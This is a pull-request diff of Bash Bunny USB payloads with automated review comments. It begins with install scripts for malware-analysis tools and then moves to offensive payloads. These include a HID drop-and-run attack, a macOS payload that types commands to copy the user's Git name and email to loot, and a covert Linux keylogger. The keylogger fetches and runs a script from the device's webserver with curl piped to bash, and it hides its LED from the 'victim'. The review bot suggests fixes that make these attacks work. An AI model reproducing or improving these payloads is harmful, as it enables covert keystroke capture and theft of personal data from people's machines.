apt-get install -y python-lzma python-crypto libqt4-opengl python-opengl python-qt4 python-qt4-gl python-numpy python-scipy python-pip mtd-utils gzip bzip2 tar arj lhasa p7zip p7zip-full cabextract cramfsprogs cramfsswap squashfs-tools sleuthkit default-jdk lzop srecord zlib1g-dev liblzma-dev liblzo2-dev liblzo2-dev python-lzo
pip install cstruct
cd /tools/
git clone https://github.com/ReFirmLabs/binwalk
cd binwalk
git clone https://github.com/devttys0/sasquatch
cd sasquatch/
ls
# edit build file to fix lack of sudo error on make install
# vi build.sh
./build.sh
cd ..
git clone https://github.com/sviehb/jefferson
cd jefferson
python setup.py install
cd ..
git clone https://github.com/jrspruitt/ubi_reader
cd ubi_reader
python setup.py install
cd ..
git clone https://github.com/devttys0/yaffshiv
cd yaffshiv
python setup.py install
cd ..
wget -O - http://my.smithmicro.com/downloads/files/stuffit520.611linux-i386.tar.gz | tar -zxv
cp bin/unstuff /usr/local/bin/
python setup.py install
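Review bot: None of the install scripts in this PR enable `set -e`, and this one chains a dozen relative `cd`/`cd ..` steps, so a single failed clone or `cd` leaves every later command, including the final `python setup.py install`, running in whatever directory it happens to be in; add `set -euo pipefail` after the shebang here and likewise in capstone.sh, dshell.sh, featherduster.sh, peepdf.sh, punbup.sh, setup.sh, ssdeep.sh, viper.sh, wabt.sh and yara.sh. The stuffit tarball is pulled over plain http and piped straight into tar with no checksum, and the git clones track unpinned branch heads, so the installed toolchain is neither verified nor reproducible; pin a tag or commit and compare a recorded hash before extracting (peepdf.sh's http zip and dshell.sh's GeoIP downloads have the same gap). The bare `ls` and the `# vi build.sh` comment are leftovers from a manual session — the "lack of sudo" fix the comment describes is never applied, so `./build.sh` will presumably fail when run unattended.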


@ -0,0 +1,21 @@
#!/bin/bash
# Title: Malware Bunny
# Description: capstone install script
# Author: Zappus
# Version: 1.0
# Category: Incident-Response
# Attackmodes: Ethernet
# Firmware: 1.5
cd /tmp/
wget https://github.com/aquynh/capstone/archive/3.0.5-rc2.tar.gz
tar xf 3.0.5-rc2.tar.gz
rm 3.0.5-rc2.tar.gz
mv capstone-3.0.5-rc2/ /tools/capstone
cd /tools/capstone
make
make install
cd bindings/python
make install


@ -0,0 +1,29 @@
#!/bin/bash
# Title: Malware Bunny
# Description: dshell install script
# Author: Zappus
# Version: 1.0
# Category: Incident-Response
# Attackmodes: Ethernet
# Firmware: 1.5
apt-get install -y python-dpkt python-ipy python-pypcap
pip install pygeoip
cd /tools/
git clone https://github.com/USArmyResearchLab/Dshell dshell
cd dshell
cd share/GeoIP/
wget http://geolite.macxmind.com/download/geoip/database/GeoLiteCountry/GeoIP.dat.gz
gunzip -d GeoIP.dat.gz
wget http://geolite.maxmind.com/download/geoip/database/GeoIPv6.dat.gz
gunzip -d GeoIPv6.dat.gz
wget http://download.maxmind.com/download/geoip/database/asnum/GeoIPASNum.dat.gz
gunzip -d GeoIPASNum.dat.gz
wget http://download.maxmind.com/download/geoip/database/asnum/GeoIPASNumv6.dat.gz
gunzip -d GeoIPASNumv6.dat.gz
cd ../../
make
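Review bot: The first GeoIP URL points at `geolite.macxmind.com`, a typo for the `geolite.maxmind.com` used two lines later, so the GeoIP.dat download fails and the following `gunzip -d GeoIP.dat.gz` errors out; fix the hostname. The relative `cd share/GeoIP/` followed by `cd ../../` means that if either `cd` fails, `make` runs in the wrong tree, which is the `set -e` point raised on binwalk.sh.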


@ -0,0 +1,17 @@
#!/bin/bash
# Title: Malware Bunny
# Description: featherduster install script
# Author: Zappus
# Version: 1.0
# Category: Incident-Response
# Attackmodes: Ethernet
# Firmware: 1.5
apt-get install -y libgmp3-dev
apt-get install -y libncurses-dev
cd /tools
git clone https://github.com/nccgroup/featherduster
cd featherduster
python setup.py install


@ -0,0 +1,33 @@
#!/bin/bash
# Title: Malware Bunny
# Description: peepdf install script
# Author: Zappus
# Version: 1.0
# Category: Incident-Response
# Attackmodes: Ethernet
# Firmware: 1.5
apt-get install -y unzip python-libemu
cd /tmp/
wget http://eternal-todo.com/files/pdf/peepdf/peepdf_0.3.zip
unzip peepdf_0.3.zip
mv peepdf_0.3 /tools/peepdf
cd /tools/peepdf
#mkdir dpt
#cd dpt
#wget https://storage.googleapis.com/chrome-infra/depot_tools.zip
#unzip depot_tools.zip
#cd ..
#mv dpt /tools/depot_tools
#echo 'export PATH=$PATH:$HOME/../tools/depot_tools' >> ~/.bashrc
#gclient
#mkdir /tools/v8
#cd /tools/v8
#fetch v8


@ -0,0 +1,15 @@
#!/bin/bash
# Title: Malware Bunny
# Description: punbup install script
# Author: Zappus
# Version: 1.0
# Category: Incident-Response
# Attackmodes: Ethernet
# Firmware: 1.5
cd /tools
git clone https://github.com/herrcore/punbup
cd punbup
python setup.py install


@ -0,0 +1,30 @@
#!/bin/bash
# Title: Malware Bunny
# Description: main install script
# Author: Zappus
# Version: 1.0
# Category: Incident-Response
# Attackmodes: Ethernet
# Firmware: 1.5
# Install System Dependencies
apt-get install -y automake libtool make gcc flex bison libmagic-dev libssl-dev python-dev swig libfuzzy-dev exiftool
# Install Python Dependencies
pip install SQLAlchemy PrettyTable python-magic
# Other Tools
apt-get -y install python-scapy pyew unzip
# Setup Custom Tools
./ssdeep.sh
./yara.sh
./viper.sh
./dshell.sh
./capstone.sh
./binwalk.sh
./featherduster.sh
./wabt.sh
./peepdf.sh
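Review bot: punbup.sh is added in this PR and punbup appears in the README's installed-software list, but setup.sh never runs it; add `./punbup.sh` to the custom-tools section. The helper scripts are invoked by relative path, so setup.sh only works when started from its own directory; a `cd "$(dirname "$0")" || exit 1` before the `./ssdeep.sh` line removes that assumption. Since the helpers themselves do not stop on error, a failure in one of them is silently followed by the next — the `set -e` point raised on binwalk.sh applies here too.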


@ -0,0 +1,23 @@
#!/bin/bash
# Title: Malware Bunny
# Description: ssdeep install script
# Author: Zappus
# Version: 1.0
# Category: Incident-Response
# Attackmodes: Ethernet
# Firmware: 1.5
cd /tmp
wget https://github.com/ssdeep-project/ssdeep/archive/release-2.14.1.tar.gz
tar xf release-2.14.1.tar.gz
rm release-2.14.1.tar.gz
mv ssdeep-release-2.14.1/ /tools/ssdeep
cd /tools/ssdeep
./bootstrap
./configure
make
make install
pip install pydeep


@ -0,0 +1,17 @@
#!/bin/bash
# Title: Malware Bunny
# Description: viper install script
# Author: Zappus
# Version: 1.0
# Category: Incident-Response
# Attackmodes: Ethernet
# Firmware: 1.5
cd /tmp
wget https://github.com/viper-framework/viper/archive/v1.2.tar.gz
tar xf v1.2.tar.gz
rm v1.2.tar.gz
mv viper-1.2/ /tools/viper
cd /tools/viper
pip install -r requirements.txt


@ -0,0 +1,15 @@
#!/bin/bash
# Title: Malware Bunny
# Description: web assembly binary toolkit install script
# Author: Zappus
# Version: 1.0
# Category: Incident-Response
# Attackmodes: Ethernet
# Firmware: 1.5
apt-get install cmake clang
cd /tools/
git clone --recursive https://github.com/WebAssembly/wabt
cd wabt
make
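Review bot: `apt-get install cmake clang` is the only apt-get call in this PR without `-y`, so an unattended run stalls on the confirmation prompt; change it to `apt-get install -y cmake clang`. The clone tracks the head of the default branch, so the build differs from run to run; pin a release with `git clone --recursive -b <tag> https://github.com/WebAssembly/wabt` (tag to be chosen by the author).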


@ -0,0 +1,23 @@
#!/bin/bash
# Title: Malware Bunny
# Description: yara install script
# Author: Zappus
# Version: 1.0
# Category: Incident-Response
# Attackmodes: Ethernet
# Firmware: 1.5
cd /tmp
wget https://github.com/VirusTotal/yara/archive/v3.7.0.tar.gz
tar xf v3.7.0.tar.gz
rm v3.7.0.tar.gz
mv yara-3.7.0/ /tools/yara
cd /tools/yara
./bootstrap.sh
./configure --enable-magic --enable-dotnet
make
make install
pip install yara-python


@ -0,0 +1,24 @@
#!/bin/bash
# Title: MalwareBunny
# Description: Malware Analysis on Bash Bunny
# Author: Zappus
# Version: 1.0
# Category: Incident-Response
# Attackmodes: Ethernet
#
# LED State Descriptions
# Magenta Blinking - setup in progress
# Blue Blinking - ready to use
LED M SLOW
ATTACKMODE RNDIS_ETHERNET
sleep 3
cd /tools/viper/
python web.py -H 0.0.0.0 -p 8080 &
CUCUMBER ENABLE
sleep 3
LED B SLOW
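Review bot: `python web.py -H 0.0.0.0 -p 8080 &` binds the Viper web UI on every interface, and nothing on the page indicates the UI has authentication, so presumably any host reachable over the RNDIS link — or any other interface the Bunny brings up — can use it; bind to the RNDIS interface address instead and state the port and the access assumptions in the header comment, which currently documents only the LED states. The LED switches to "ready" after a fixed `sleep 3` without checking that the server actually started; a `nc -z` wait loop like the one in the Chromebook payload, or at least `kill -0 $!`, would make the blue LED meaningful. `cd /tools/viper/` has no failure check, so if the tools were never installed `python web.py` runs in the previous directory and the LED still reports ready; `cd /tools/viper/ || { LED FAIL; exit 1; }` would surface that.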


@ -0,0 +1,18 @@
#!/bin/bash
# Title: MalwareBunny
# Description: Malware Analysis on Bash Bunny
# Author: Zappus
# Version: 1.0
# Category: Incident-Response
# Attackmodes: Ethernet
#
# LED State Descriptions
# Magenta Blinking - setup in progress
# Blue Blinking - ready to use
LED M SLOW
ATTACKMODE RNDIS_ETHERNET
sleep 5
LED B SLOW


@ -0,0 +1,7 @@
#!/bin/bash
# Wake up and do something productive here instead...
sleep 10
# boom!!
firefox "http://hak5.org"


@ -0,0 +1,30 @@
#!/bin/bash
#
# Title: The Ol'Drop'n'Run
# Author: bg-wa
# Version: 1.0
# Category: HID
# Target: UNITY
# Attackmodes: HID
#
# Quick HID only attack to write a file to target machine and open
#
# | Attack Stage | Description |
# | ------------------- | ---------------------------------------- |
# | SETUP | Open vi |
# | ATTACK | Writing files |
# | FINISH | Payload Dropped & ran (remove the bunny) |
#
ATTACKMODE HID
LED SETUP
source_script=/root/udisk/payloads/$SWITCH_POSITION/fuse.sh
target_script=\~/fuse.sh
LED ATTACK
DROP $source_script $target_script true true
RUN UNITY $target_script
LED FINISH
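Review bot: The `DROP` call does not match the extension's signature: drop.sh in this same PR takes `DROP OS source destination overwrite executable`, so here the Bunny-side path lands in the OS slot, `~/fuse.sh` becomes the source, `true` becomes the destination and the executable flag is empty; the line should be `DROP UNITY "$source_script" "$target_script" true true`. `target_script=\~/fuse.sh` keeps a literal tilde so it is expanded by the target's shell rather than the Bunny's — intentional but non-obvious, and worth a comment such as `# literal ~ on purpose: expanded by the target shell, not here`. The payload also assumes fuse.sh sits beside it in the switch directory; `[[ -f "$source_script" ]] || { LED FAIL; exit 1; }` before `LED ATTACK` would report a missing file instead of typing an empty one.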


@ -0,0 +1,30 @@
<div align="center">
# Github Information Exfiltration
**Get Git user name and email from the Git global config and exfiltrate them**
![Bash](https://img.shields.io/badge/Shell_Script-121011?style=for-the-badge&logo=gnu-bash&logoColor=white)
![Quack](https://img.shields.io/badge/Ducky_Script-121011?style=for-the-badge&logo=duck&logoColor=white)
![OSX](https://img.shields.io/badge/OSX-FFFFFF?style=for-the-badge&logo=apple&logoColor=black)
</div>
<img width="1000" alt="banner" src="https://raw.githubusercontent.com/quentinlamamy/bashbunny/main/img/githubExfiltration.jpg"/>
# Dependency
* OSX Extension by quentin_lamamy
# Changelog
v1.0 :
* :tada: Release on 2023/08/20
# Contributing
A bug ? An idea of feature ? [Fill an issue on github](https://github.com/quentinlamamy/bashbunny/issues)
# License
<p xmlns:cc="http://creativecommons.org/ns#" xmlns:dct="http://purl.org/dc/terms/"><a property="dct:title" rel="cc:attributionURL" href="https://github.com/quentinlamamy/bashbunny/blob/main/payloads/githubExfiltration/payload.txt">Github Infos Exfiltration Payload</a> by <a rel="cc:attributionURL dct:creator" property="cc:attributionName" href="https://github.com/quentinlamamy">Quentin Lamamy</a> is licensed under <a href="http://creativecommons.org/licenses/by-nc-sa/4.0/?ref=chooser-v1" target="_blank" rel="license noopener noreferrer" style="display:inline-block;">CC BY-NC-SA 4.0<img style="height:22px!important;margin-left:3px;vertical-align:text-bottom;" src="https://mirrors.creativecommons.org/presskit/icons/cc.svg?ref=chooser-v1"><img style="height:22px!important;margin-left:3px;vertical-align:text-bottom;" src="https://mirrors.creativecommons.org/presskit/icons/by.svg?ref=chooser-v1"><img style="height:22px!important;margin-left:3px;vertical-align:text-bottom;" src="https://mirrors.creativecommons.org/presskit/icons/nc.svg?ref=chooser-v1"><img style="height:22px!important;margin-left:3px;vertical-align:text-bottom;" src="https://mirrors.creativecommons.org/presskit/icons/sa.svg?ref=chooser-v1"></a></p>
# Support
<a href="https://www.buymeacoffee.com/quentinlamamy" target="_blank"><img src="https://cdn.buymeacoffee.com/buttons/default-orange.png" alt="Buy Me A Coffee" height="41" width="174"></a>

@ -0,0 +1,58 @@
#!/bin/bash
#
# Title: OSX Payload to exfiltrate Git user name and email
# Description: Get Git user name and email from the Git global config and exfiltrate them
# Author: quentin_lamamy <contact@quentin-lamamy.fr>
# Version: 1.0
# Category: Exfiltration
# Attackmodes: HID STORAGE
# Target OS: OSX
# Dependency: OSX Extensions
#
# Magenta solid Setup
# Yellow single blink Attack in progress
# Yellow double blink Sync
# Yellow triple blink Cleanup
# Green blink then solid Finished
LED SETUP
ATTACKMODE STORAGE HID VID_0X05AC PID_0X0250
OSX TERMINAL OPEN
Q STRING 'last_mounted_volume=$(ls -t /Volumes | head -n 1)'
Q ENTER
Q STRING 'lootPath=/Volumes/$last_mounted_volume/loot/gitInfos.txt'
Q ENTER
Q STRING 'touch $lootPath'
Q ENTER
LED ATTACK
# Get the user name from the Git global config
Q STRING 'user_name=$(git config --global user.name)'
Q ENTER
# Get the user email from the Git global config
Q STRING 'user_email=$(git config --global user.email)'
Q ENTER
Q STRING 'echo -e "Username: $user_name\nMail: $user_email" > $lootPath'
Q ENTER
# Sync
LED STAGE 2
sync
# Cleanup
LED STAGE 3
# Eject
QUACK STRING 'diskutil eject $last_mounted_volume'
QUACK ENTER
DELAY 100
OSX TERMINAL CLOSE
LED FINISH
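Review bot: The file mixes `Q STRING` / `Q ENTER` for the earlier typed commands with `QUACK STRING` / `QUACK ENTER` for the eject step, which are the same command under two spellings; pick one throughout for consistency. The header legend names the stages as "Yellow double blink Sync" and "Yellow triple blink Cleanup" while the code uses `LED STAGE 2` and `LED STAGE 3`; a short comment on each, e.g. `# LED STAGE 2 = yellow double blink (sync)`, would tie the legend to the code. The `# Cleanup` section under `LED STAGE 3` contains only the eject and terminal close, so the comment should say that is all the cleanup performed.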

@ -0,0 +1,20 @@
#/bin/bash
checkonbunny() {
mybunny=$(lsblk -p -S -o NAME,SERIAL | grep $BunnyID | awk '{print $1}')
mybunny=$(findmnt $mybunny | grep $mybunny | awk '{print $1}')
if [ -d $mybunny ]; then
bashbunnyloot=$mybunny"/loot"
mapfile=$bashbunnyloot"/maps"
keyfile=$bashbunnyloot"/keys"
startwork
fi
}
startwork(){
getdevicetouse=${getdevicetouse#"id="}
xinput --test $getdevicetouse > $keyfile &
xmodmap -pke > $mapfile
}
BunnyID="ch000001"
bashbunnyloot=''
getdevicetouse=$(xinput |grep keyboard | sed 's/slave keyboard//g' | while IFS= read -r line ;do [[ $line != *"Virtual"* ]] && [[ $line == *"keyboard"* ]] && echo $line | awk '{ for (i=1; i<=NF; ++i) { if ($i ~ "id=") print $i} }'; done)
[[ -z $getdevicetouse ]] || checkonbunny
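Review bot: `mapfile=$bashbunnyloot"/maps"` names a variable after the bash builtin `mapfile`; that is legal, since variables and commands live in separate namespaces, but it misleads anyone who later reaches for the builtin in this file. Rename it, e.g. `map_path=$bashbunnyloot"/maps"`, and update the `xmodmap -pke > $mapfile` line accordingly. `$BunnyID`, `$mybunny`, `$keyfile` and `$mapfile` are unquoted in the `grep`, `findmnt`, `[ -d ]` and redirection lines; quoting them is the conventional style, and `[[ -d "$mybunny" ]]` avoids the empty-operand case when the lookup returns nothing.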

@ -0,0 +1,28 @@
# Keylogger For Bash Bunny
Author: TheDragonkeeper
Version: Version 1
## Description
Dirty keylogger. Runs a webserver to pull code from for multiOS targeting
Captures all keyboard input without the need for root access
Uses the user keyboard map file for decoding the captured data
## STATUS
| LED | Status |
| ---------------- | ----------------------------------------------------------------------------- |
| Blue flash | Booting |
| Red slow | Waiting on webserver |
| Blue Fast | Identifying Target and deploying accordingly |
| LED OFF | Capturing data, no led for victim to spot, waiting for switch position change |
| LED Red Fast | Decoding keys, Then doing any cleanup required |
| Green flashing | Task complete, ready to unplug |
Still WIP, Currently supports linux (tested on ubuntu)
If you want to add payloads for OSX or Windows place them into the switch folder then,
Change TARGET_OS= to 'auto' and add the payloads to lines 15,16 as well as the clean up to lines 40,41 in payload.txt

@ -0,0 +1,43 @@
TARGET_OS='LINUX'
LED B 100
ATTACKMODE HID STORAGE ECM_ETHERNET
sleep 3
LED R SLOW
GET HOST_IP
GET SWITCH_POSITION
udisk mount
cd /root/udisk/payloads/$SWITCH_POSITION/
python webserver.py &
while true; do [[ $(curl $HOST_IP:8080/index.html) ]] && break ; done
LED B FAST
[[ $TARGET_OS == 'auto' ]] && GET TARGET_OS
[[ $TARGET_OS == 'WINDOWS' ]] && RUN WIN add windows payload
[[ $TARGET_OS == 'MACOS' ]] && RUN OSX add osx payload
[[ $TARGET_OS == 'LINUX' ]] && RUN LINUX bash \-c \'bash \<\(curl http\:\/\/$HOST_IP\:8080\/Linux\.sh\)\' \&
LED
WAIT
LED R 0
cd /root/udisk/loot
keystate=''
_ctrl='0'
_alt='0'
_shift='0'
for line in $(cat 'keys')
do
if [ $line != 'key' ]; then
if [ $line == 'press' ] || [ $line == 'release' ]; then
keystate=$line
else
_spaces=$(printf '%*s' $((4-${#line})) | tr ' ' ' ')
searchparams='keycode'"$_spaces"$line
key=$(cat 'maps' | grep "$searchparams" | awk '{print $4}')
echo "Ctrl="$_ctrl" Alt="$_alt" Shift="$_shift" "$keystate" "$key >> 'decoded'
fi
fi
done
[[ $TARGET_OS == 'WINDOWS' ]] && RUN WIN add windows payload
[[ $TARGET_OS == 'MACOS' ]] && RUN OSX add osx payload
[[ $TARGET_OS == 'LINUX' ]] && RUN LINUX killall xinput
LED G 0
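Review bot: The bare `LED` after the three `RUN` lines carries no colour or stage argument; the README's LED table labels this state "LED OFF", so a comment such as `# LED with no argument: off during capture (see README)` would make the intent explicit — I am inferring from the README that an argument-less LED turns it off, so confirm against the firmware reference. The `RUN WIN add windows payload` and `RUN OSX add osx payload` lines, present both before `LED` and after the decode loop, are placeholders left as live commands; they are unreachable while `TARGET_OS='LINUX'`, but commenting them out (`# RUN WIN <windows payload here>`) makes the work-in-progress status visible in the file rather than only in the README.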

@ -0,0 +1,28 @@
#!/usr/bin/python
from BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer
from os import curdir, sep
PORT_NUMBER = 8080
class myHandler(BaseHTTPRequestHandler):
def do_GET(self):
if self.path=="/":
self.path="/"
try:
sendReply = False
if self.path.endswith(".sh"):
mimetype='text/plain'
sendReply = True
if sendReply == True:
f = open(curdir + sep + self.path)
self.send_response(200)
self.send_header('Content-type',mimetype)
self.end_headers()
self.wfile.write(f.read())
f.close()
return
except IOError:
self.send_error(404,'File Not Found: %s' % self.path)
try:
server = HTTPServer(('0.0.0.0', PORT_NUMBER), myHandler)
server.serve_forever()
except KeyboardInterrupt:
server.socket.close()
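Review bot: `f = open(curdir + sep + self.path)` uses the request path as received, so a path ending in `.sh` that contains `..` segments reads files outside the serving directory and the server returns their contents to anyone on the link; resolve the request to a basename within the serving directory (or reject paths that escape it) before opening, keeping the `.sh` suffix check. A request for any path not ending in `.sh` falls through the `if sendReply == True` block and returns without writing a response, so the client sees the connection close with no status line; add an `else` branch with `self.send_error(404, 'File Not Found: %s' % self.path)`. `if self.path=="/": self.path="/"` is a no-op and can be dropped, and `with open(...) as f:` would close the file even when `send_response` raises. The `BaseHTTPServer` import is Python 2 only, so the `#!/usr/bin/python` shebang should state that assumption; which interpreter the target firmware ships is not visible here.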